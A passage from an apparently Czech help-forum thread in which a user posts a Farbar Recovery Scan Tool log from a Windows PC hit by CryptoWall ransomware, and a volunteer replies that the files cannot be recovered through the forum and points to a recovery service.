2015-08-26 21:58 - 2015-07-09 18:14 - 00228864 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2015-08-26 21:58 - 2015-07-03 23:51 - 01380056 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2015-08-26 21:58 - 2015-07-03 16:00 - 01097216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2015-08-26 21:58 - 2015-06-27 13:47 - 00118616 _____ (Microsoft Corporation) C:\WINDOWS\system32\consent.exe
2015-08-26 21:58 - 2015-06-19 19:07 - 02819072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers.dll
2015-08-26 21:58 - 2015-05-01 03:13 - 06521800 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2015-08-26 21:58 - 2015-05-01 03:13 - 01488000 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2015-08-26 21:58 - 2015-05-01 03:13 - 00261376 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppwinob.dll
2015-08-26 21:57 - 2015-07-10 21:06 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthpan.sys
2015-08-26 21:57 - 2015-06-10 00:39 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BTHUSB.SYS
2015-08-26 21:57 - 2015-06-10 00:39 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthenum.sys
2015-08-26 21:57 - 2015-06-10 00:38 - 01201664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2015-08-26 21:42 - 2014-04-16 01:35 - 00028352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aspnet_counters.dll
2015-08-26 21:42 - 2014-04-16 01:34 - 00029888 _____ (Microsoft Corporation) C:\WINDOWS\system32\aspnet_counters.dll
2015-08-26 21:31 - 2015-08-26 21:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2015-08-22 12:37 - 2015-08-22 12:46 - 407010384 _____ (Microsoft Corporation) C:\Users\tomas\Downloads\X12-30196.exe
2015-08-20 18:16 - 2015-08-11 03:20 - 25191936 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2015-08-20 18:16 - 2015-08-11 02:20 - 19871232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2015-08-18 20:02 - 2015-08-18 20:02 - 03237248 _____ (Enigma Software Group USA, LLC.) C:\Users\tomas\Downloads\SpyHunter-Installer.exe
2015-08-18 19:00 - 2015-08-18 19:00 - 06326224 _____ C:\Users\tomas\Downloads\KMSPico 10.0.8.exe (1).zip
2015-08-18 18:27 - 2015-08-18 18:27 - 06326224 _____ C:\Users\tomas\Downloads\KMSPico 10.0.8.exe.zip
2015-08-14 15:57 - 2015-08-14 15:57 - 00000222 _____ C:\Users\tomas\Desktop\Path of Exile.url
2015-08-14 15:02 - 2015-07-30 16:04 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2015-08-14 15:02 - 2015-07-30 15:48 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2015-08-14 14:34 - 2015-07-16 02:29 - 07458648 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2015-08-14 14:34 - 2015-07-16 02:29 - 01735000 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2015-08-14 14:34 - 2015-07-16 02:29 - 00101720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mountmgr.sys
2015-08-14 14:34 - 2015-07-16 02:28 - 01499920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2015-08-14 14:34 - 2015-07-10 19:54 - 01217024 _____ (Microsoft Corporation) C:\WINDOWS\system32\sysmain.dll
2015-08-14 14:33 - 2015-07-19 03:58 - 00136904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2015-08-14 14:33 - 2015-07-18 20:51 - 03704320 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2015-08-14 14:33 - 2015-07-18 20:31 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll
2015-08-14 14:33 - 2015-07-18 20:31 - 00095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2015-08-14 14:33 - 2015-07-18 20:31 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe
2015-08-14 14:33 - 2015-07-18 20:29 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WUSettingsProvider.dll
2015-08-14 14:33 - 2015-07-18 20:29 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll
2015-08-14 14:33 - 2015-07-18 20:29 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe
2015-08-14 14:33 - 2015-07-18 20:28 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2015-08-14 14:33 - 2015-07-18 20:12 - 02228736 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll
2015-08-14 14:33 - 2015-07-18 20:10 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2015-08-14 14:33 - 2015-07-18 20:09 - 00721920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2015-08-14 14:32 - 2015-07-16 22:36 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2015-08-14 14:32 - 2015-07-16 22:36 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\html.iec
2015-08-14 14:32 - 2015-07-16 22:35 - 02885632 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2015-08-14 14:32 - 2015-07-16 22:26 - 05923328 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2015-08-14 14:32 - 2015-07-16 22:23 - 00615936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll
2015-08-14 14:32 - 2015-07-16 22:21 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2015-08-14 14:32 - 2015-07-16 21:53 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2015-08-14 14:32 - 2015-07-16 21:51 - 00504320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2015-08-14 14:32 - 2015-07-16 21:50 - 00341504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\html.iec
2015-08-14 14:32 - 2015-07-16 21:45 - 02279424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2015-08-14 14:32 - 2015-07-16 21:45 - 01032704 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2015-08-14 14:32 - 2015-07-16 21:41 - 00479232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieui.dll
2015-08-14 14:32 - 2015-07-16 21:39 - 00664064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2015-08-14 14:32 - 2015-07-16 21:38 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2015-08-14 14:32 - 2015-07-16 21:36 - 00801280 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2015-08-14 14:32 - 2015-07-16 21:34 - 14451200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2015-08-14 14:32 - 2015-07-16 21:32 - 02125824 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2015-08-14 14:32 - 2015-07-16 21:14 - 02880000 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2015-08-14 14:32 - 2015-07-16 21:13 - 00880128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2015-08-14 14:32 - 2015-07-16 21:12 - 04520448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2015-08-14 14:32 - 2015-07-16 21:12 - 02427904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2015-08-14 14:32 - 2015-07-16 21:10 - 12856832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2015-08-14 14:32 - 2015-07-16 21:06 - 00689152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2015-08-14 14:32 - 2015-07-16 21:01 - 01545728 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2015-08-14 14:32 - 2015-07-16 20:52 - 01048576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\actxprxy.dll
2015-08-14 14:32 - 2015-07-16 20:49 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2015-08-14 14:32 - 2015-07-16 20:42 - 01951232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2015-08-14 14:32 - 2015-07-16 20:38 - 01310720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2015-08-14 14:32 - 2015-07-16 20:37 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2015-08-14 14:30 - 2015-07-29 01:24 - 00025776 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2015-08-14 14:30 - 2015-07-28 16:24 - 01148416 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2015-08-14 14:30 - 2015-07-28 16:24 - 01116160 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2015-08-14 14:30 - 2015-07-28 16:24 - 00774144 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2015-08-14 14:30 - 2015-07-28 16:24 - 00743424 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2015-08-14 14:30 - 2015-07-28 16:24 - 00437248 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2015-08-14 14:30 - 2015-07-28 16:24 - 00069120 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2015-08-14 14:30 - 2015-07-07 11:40 - 00270168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdFilter.sys
2015-08-14 14:30 - 2015-07-07 11:40 - 00114520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdNisDrv.sys
2015-08-14 14:30 - 2015-07-07 11:40 - 00044560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdBoot.sys
2015-08-14 14:30 - 2015-07-02 00:19 - 00228864 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebClnt.dll
2015-08-14 14:30 - 2015-07-02 00:16 - 00104448 _____ (Microsoft Corporation) C:\WINDOWS\system32\davclnt.dll
2015-08-14 14:30 - 2015-07-01 23:37 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WebClnt.dll
2015-08-14 14:30 - 2015-07-01 23:35 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\davclnt.dll
2015-08-14 14:30 - 2015-06-12 19:03 - 18823680 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2015-08-14 14:30 - 2015-06-12 18:36 - 15159296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2015-08-14 14:29 - 2015-07-29 16:37 - 01994752 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2015-08-14 14:29 - 2015-07-29 16:30 - 01381888 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2015-08-14 14:29 - 2015-07-29 16:23 - 01559552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2015-08-14 14:29 - 2015-07-24 20:57 - 04177408 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2015-08-14 14:29 - 2015-07-24 20:57 - 00358912 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2015-08-14 14:29 - 2015-07-24 20:52 - 00044032 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2015-08-14 14:29 - 2015-07-24 19:27 - 00301568 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2015-08-14 14:29 - 2015-07-24 19:23 - 00035840 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2015-08-14 14:29 - 2015-07-14 23:59 - 01113944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2015-08-14 14:29 - 2015-07-14 23:59 - 00487256 _____ (Microsoft Corporation) C:\WINDOWS\system32\netcfgx.dll
2015-08-14 14:29 - 2015-07-14 23:59 - 00393560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netcfgx.dll
2015-08-14 14:29 - 2015-07-14 05:22 - 02529880 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2015-08-14 14:29 - 2015-07-14 05:21 - 01901776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2015-08-14 14:29 - 2015-07-13 21:46 - 00059392 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll
2015-08-14 14:29 - 2015-07-13 21:45 - 00059392 _____ (Microsoft Corporation) C:\WINDOWS\system32\basesrv.dll
2015-08-14 14:29 - 2015-07-10 20:19 - 01101824 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdvidcrl.dll
2015-08-14 14:29 - 2015-07-10 19:42 - 02345472 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2015-08-14 14:29 - 2015-07-10 19:14 - 00856064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdvidcrl.dll
2015-08-14 14:29 - 2015-07-10 19:13 - 07032320 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2015-08-14 14:29 - 2015-07-10 18:47 - 01556992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2015-08-14 14:29 - 2015-07-10 18:31 - 06213120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2015-08-14 14:29 - 2015-07-09 19:13 - 00221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\notepad.exe
2015-08-14 14:29 - 2015-07-09 19:13 - 00221184 _____ (Microsoft Corporation) C:\WINDOWS\notepad.exe
2015-08-14 14:29 - 2015-07-09 18:30 - 00212992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\notepad.exe
2015-08-14 14:29 - 2015-06-11 22:12 - 02476376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2015-08-14 14:29 - 2015-06-11 22:12 - 00428888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-09-08 19:04 - 2015-02-07 14:44 - 00198144 ___SH C:\Users\tomas\Desktop\Thumbs.db
2015-09-08 19:04 - 2015-02-05 20:07 - 00000000 ____D C:\WarThunder
2015-09-08 19:04 - 2014-12-22 18:54 - 00000000 ____D C:\Users\tomas
2015-09-08 19:02 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\sru
2015-09-08 19:01 - 2015-07-26 20:16 - 00000000 ____D C:\Users\tomas\Desktop\stul
2015-09-08 19:01 - 2015-04-11 23:09 - 00000000 ____D C:\Users\tomas\Documents\Data
2015-09-08 19:01 - 2015-01-16 19:52 - 00000000 ____D C:\Users\tomas\Documents\My Games
2015-09-08 18:58 - 2015-07-30 21:10 - 00000000 ____D C:\Users\tomas\Desktop\Nová složka
2015-09-08 18:57 - 2014-12-22 21:24 - 00000000 ____D C:\Users\tomas\AppData\Roaming\ICQM
2015-09-08 18:57 - 2014-12-22 20:37 - 00000000 ____D C:\Users\tomas\AppData\Roaming\Mozilla
2015-09-08 18:57 - 2014-12-22 19:25 - 00000000 ____D C:\Users\tomas\AppData\Roaming\uTorrent
2015-09-08 18:56 - 2014-12-22 21:24 - 00000000 ____D C:\Users\tomas\AppData\Roaming\ICQ-Profile
2015-09-08 18:53 - 2015-04-11 23:18 - 00000000 ____D C:\Users\tomas\AppData\Local\Skyrim
2015-09-08 18:53 - 2014-12-22 19:22 - 00000000 ____D C:\Users\tomas\AppData\Local\Google
2015-09-08 18:52 - 2015-05-16 23:13 - 00000000 ____D C:\Users\tomas\AppData\Local\Geckofx
2015-09-08 18:52 - 2015-01-20 21:18 - 00000000 ____D C:\Users\tomas\AppData\Local\DassaultSystemes
2015-09-06 18:05 - 2014-12-22 19:00 - 00003596 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-20688079-3506957125-3551254075-1001
2015-09-06 17:15 - 2015-05-06 22:18 - 00000000 ____D C:\Program Files (x86)\Steam
2015-09-06 16:55 - 2013-08-22 16:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2015-09-06 16:49 - 2013-08-22 15:25 - 00000207 _____ C:\WINDOWS\win.ini
2015-09-06 16:25 - 2013-08-22 15:25 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
2015-09-06 16:07 - 2014-12-22 19:16 - 00747334 _____ C:\WINDOWS\system32\perfh005.dat
2015-09-06 16:07 - 2014-12-22 19:16 - 00154558 _____ C:\WINDOWS\system32\perfc005.dat
2015-09-06 16:07 - 2014-03-18 12:04 - 01745984 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2015-09-05 10:33 - 2014-12-22 19:23 - 00002203 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-09-05 10:30 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\AppReadiness
2015-09-05 10:29 - 2015-07-22 19:26 - 00001950 _____ C:\Users\Public\Desktop\McAfee Security Scan Plus.lnk
2015-08-29 03:21 - 2014-12-22 19:22 - 00003956 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2015-08-29 03:21 - 2014-12-22 19:22 - 00003720 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2015-08-29 03:21 - 2014-12-22 19:22 - 00000984 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2015-08-29 03:21 - 2014-12-22 19:22 - 00000980 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2015-08-27 05:55 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\rescache
2015-08-26 22:01 - 2013-08-22 17:20 - 00000000 ____D C:\WINDOWS\CbsTemp
2015-08-15 08:20 - 2013-08-22 16:44 - 00500248 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2015-08-15 08:18 - 2015-01-07 22:00 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2015-08-15 08:18 - 2015-01-07 22:00 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2015-08-15 08:13 - 2013-08-22 17:36 - 00000000 ___RD C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-08-15 08:13 - 2013-08-22 17:36 - 00000000 ___RD C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-08-15 08:13 - 2013-08-22 17:36 - 00000000 ____D C:\Program Files\Windows Defender
2015-08-15 08:13 - 2013-08-22 17:36 - 00000000 ____D C:\Program Files (x86)\Windows Defender
2015-08-14 15:03 - 2014-12-23 11:43 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013
2015-08-14 15:03 - 2014-12-23 11:39 - 00000000 ____D C:\ProgramData\Microsoft Help
2015-08-14 15:02 - 2015-01-07 22:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2015-08-14 15:00 - 2014-12-22 21:09 - 00000000 ____D C:\WINDOWS\system32\MRT
2015-08-14 14:54 - 2014-12-22 21:09 - 132483416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2015-08-14 14:48 - 2015-04-16 18:36 - 00000000 ____D C:\WINDOWS\system32\appraiser
2015-08-14 14:48 - 2014-12-23 12:51 - 00000000 ___SD C:\WINDOWS\system32\CompatTel
2015-08-14 14:48 - 2013-08-22 17:36 - 00000000 ___RD C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-08-14 14:48 - 2013-08-22 17:36 - 00000000 ___RD C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories

==================== Files in the root of some directories =======

2015-09-08 18:57 - 2015-09-08 18:57 - 0008628 _____ () C:\Users\tomas\AppData\Roaming\HELP_DECRYPT.HTML
2015-09-08 18:57 - 2015-09-08 18:57 - 0045651 _____ () C:\Users\tomas\AppData\Roaming\HELP_DECRYPT.PNG
2015-09-08 18:57 - 2015-09-08 18:57 - 0004254 _____ () C:\Users\tomas\AppData\Roaming\HELP_DECRYPT.TXT
2015-09-08 18:57 - 2015-09-08 18:57 - 0000292 _____ () C:\Users\tomas\AppData\Roaming\HELP_DECRYPT.URL
2015-09-08 18:53 - 2015-09-08 18:53 - 0008628 _____ () C:\Users\tomas\AppData\Local\HELP_DECRYPT.HTML
2015-09-08 18:53 - 2015-09-08 18:53 - 0045651 _____ () C:\Users\tomas\AppData\Local\HELP_DECRYPT.PNG
2015-09-08 18:53 - 2015-09-08 18:53 - 0004254 _____ () C:\Users\tomas\AppData\Local\HELP_DECRYPT.TXT
2015-09-08 18:53 - 2015-09-08 18:53 - 0000292 _____ () C:\Users\tomas\AppData\Local\HELP_DECRYPT.URL
2015-03-26 20:22 - 2015-03-26 20:22 - 0000000 ___SH () C:\Users\tomas\AppData\Local\LumaEmu
2014-12-23 03:11 - 2014-12-23 03:11 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2015-07-15 00:36 - 2015-06-15 23:16 - 0071680 ___SH (dswteyurtetuitr) C:\ProgramData\mscivosu.exe

Files to move or delete:
====================
C:\ProgramData\mscivosu.exe


Some files in TEMP:
====================
C:\Users\tomas\AppData\Local\Temp\avgnt.exe
C:\Users\tomas\AppData\Local\Temp\headhunter.dll
C:\Users\tomas\AppData\Local\Temp\laminator.dll


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-09-02 19:11

==================== End of FRST.txt ============================



===***===***===***=== Extract of Additional scan result of Farbar Recovery Scan Tool ===***===***===***===

==================== Drive and Memory info ===================

Drive c: () (Fixed) (Total:194.97 GB) (Free:46.25 GB) NTFS
Drive d: () (Fixed) (Total:722.7 GB) (Free:705.56 GB) NTFS
Drive e: () (Fixed) (Total:13.49 GB) (Free:13.49 GB) FAT32

Available physical RAM: 5085.76 MB
Total physical RAM: 8075.43 MB
Percentage of memory in use: 37%

==================== MBR and Partition Table ==================

Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 2BFB4DC8)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=195 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=722.7 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=13.5 GB) - (Type=0C)

==================== Scheduled Tasks (whitelisted) ==================

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Alternate Data Streams (whitelisted) ==================


==================== Security Center ==================

AV: Avira Antivirus (Enabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avira Antivirus (Enabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}



===***===***===***=== Supplementary Scan createdy by FRSTLauncher ===***===***===***===
Posledni aktualizace FRSTLauncheru: 25_11_2013 (01)
Posledni aktualizace Modifikacniho skriptu: 30_09_2013 (01)


***** Velikost "Plochy" *****

Velikost slozky "C:\Users\tomas\Desktop" je 260 MB.


***** Startup Programs *****


***** Firewall rules *****

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
EnableFirewall REG_DWORD 0x1
DisableNotifications REG_DWORD 0x0
DoNotAllowExceptions REG_DWORD 0x0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
EnableFirewall REG_DWORD 0x1
DisableNotifications REG_DWORD 0x0
DoNotAllowExceptions REG_DWORD 0x0

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]


***** System Restore *****

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"Generalize_DisableSR"=dword:00000000


==================== End Of Log ==============================

Re: cryptowall

Posted: 08 Sep 2015 18:41
by Márty84
Hello :)

Unfortunately this cannot be resolved through the forum. If you want to try to recover your data (in some cases it works), contact the team at http://neslape.cz/?utm_campaign=neslape ... edium=link and they will determine what type of virus you caught and whether there is a chance of decryption.

Re: cryptowall

Posted: 08 Sep 2015 19:18
by tomas_jedno
OK, thank you for the reply and have a nice evening : )

Re: cryptowall

Posted: 09 Sep 2015 09:50
by Márty84
You're welcome! :-)

Fingers crossed :thumbsup:

Take care, and maybe see you again sometime :bye:

:closed: